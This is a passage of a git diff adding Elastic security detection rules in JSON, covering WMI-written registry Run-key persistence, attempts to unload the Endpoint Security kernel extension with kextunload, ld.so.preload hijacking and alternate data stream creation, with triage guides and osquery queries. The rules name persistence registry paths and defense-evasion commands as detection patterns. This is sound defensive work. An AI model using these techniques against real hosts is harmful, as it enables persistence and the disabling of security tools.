concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.data.strings != null and process.name : \"WmiPrvSe.exe\" and\n registry.path : (\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Environment\\\\UserInitMprLogonScript\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\"\n )\n", + "references": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/regprov/stdregprov", + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "70d12c9c-0dbd-4a1a-bc44-1467502c9cf6", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + }, + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_106.json b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_106.json new file mode 100644 index 00000000000..d5b44dc6222 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_106.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to unload the Elastic Endpoint Security kernel extension via the kextunload command.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Attempt to Unload Elastic Endpoint Security Kernel Extension", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:kextunload and process.args:(\"/System/Library/Extensions/EndpointSecurity.kext\" or \"EndpointSecurity.kext\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "70fa1af4-27fd-4f26-bd03-50b6af6b9e24", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "70fa1af4-27fd-4f26-bd03-50b6af6b9e24_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_209.json b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_209.json new file mode 100644 index 00000000000..2e5184a49df --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/717f82c2-7741-4f9b-85b8-d06aeb853f4f_209.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modification of the dynamic linker preload shared object (ld.so.preload). Adversaries may execute malicious payloads by hijacking the dynamic linker used to load libraries.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Modification of Dynamic Linker Preload Shared Object", + "new_terms_fields": [ + "host.id", + "user.id", + "process.executable" + ], + "query": "host.os.type:linux and event.category:file and event.action:(updated or renamed or rename or file_rename_event) and \nnot event.type:deletion and file.path:/etc/ld.so.preload and not process.name:(wine or oneagentinstallaction)\n", + "references": [ + "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "717f82c2-7741-4f9b-85b8-d06aeb853f4f", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 209 + }, + "id": "717f82c2-7741-4f9b-85b8-d06aeb853f4f_209", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_113.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_113.json new file mode 100644 index 00000000000..29409d531c0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_113.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious creation of Alternate Data Streams on highly targeted files. This is uncommon for legitimate files and sometimes done by adversaries to hide malware.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual File Creation - Alternate Data Stream", + "note": "## Triage and analysis\n\n### Investigating Unusual File Creation - Alternate Data Stream\n\nAlternate Data Streams (ADS) are file attributes only found on the NTFS file system. In this file system, files are built up from a couple of attributes; one of them is $Data, also known as the data attribute.\n\nThe regular data stream, also referred to as the unnamed data stream since the name string of this attribute is empty, contains the data inside the file. So any data stream that has a name is considered an alternate data stream.\n\nAttackers can abuse these alternate data streams to hide malicious files, string payloads, etc. This rule detects the creation of alternate data streams on highly targeted file types.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Retrieve the contents of the alternate data stream, and analyze it for potential maliciousness. Analysts can use the following PowerShell cmdlet to accomplish this:\n - `Get-Content C:\\Path\\To\\file.exe -stream SampleAlternateDataStreamName`\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of process executable and file conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n file.path : \"C:\\\\*:*\" and\n not file.path : \n (\"C:\\\\*:zone.identifier*\",\n \"C:\\\\users\\\\*\\\\appdata\\\\roaming\\\\microsoft\\\\teams\\\\old_weblogs_*:$DATA\") and\n\n not process.executable :\n (\"?:\\\\windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\sihost.exe\",\n \"?:\\\\Windows\\\\System32\\\\PickerHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\SearchProtocolHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\",\n \"?:\\\\Program Files\\\\Rivet Networks\\\\SmartByte\\\\SmartByteNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files\\\\ExpressConnect\\\\ExpressConnectNetworkService.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files(x86)\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\EXCEL.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\OUTLOOK.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\POWERPNT.EXE\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\",\n \"?:\\\\Program Files\\\\Microsoft Office\\\\root\\\\*\\\\WINWORD.EXE\") and\n\n file.extension :\n (\n \"pdf\",\n \"dll\",\n \"png\",\n \"exe\",\n \"dat\",\n \"com\",\n \"bat\",\n \"cmd\",\n \"sys\",\n \"vbs\",\n \"ps1\",\n \"hta\",\n \"txt\",\n \"vbe\",\n \"js\",\n \"wsh\",\n \"docx\",\n \"doc\",\n \"xlsx\",\n \"xls\",\n \"pptx\",\n \"ppt\",\n \"rtf\",\n \"gif\",\n \"jpg\",\n \"png\",\n \"bmp\",\n \"img\",\n \"iso\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "71bccb61-e19b-452f-b104-79a60e546a95", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.004", + "name": "NTFS File Attributes", + "reference": "https://attack.mitre.org/techniques/T1564/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 113 + }, + "id": "71bccb61-e19b-452f-b104-79a60e546a95_113", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_114.json b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_114.json new file mode 100644 index 00000000000..f26bbf22385 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/71bccb61-e19b-452f-b104-79a60e546a95_114.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious creation of Alternate Data Streams on highly targeted files. This is uncommon for legitimate files and sometimes done by adversaries to hide malware.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual File Creation - Alternate Data Stream", + "note": "## Triage and 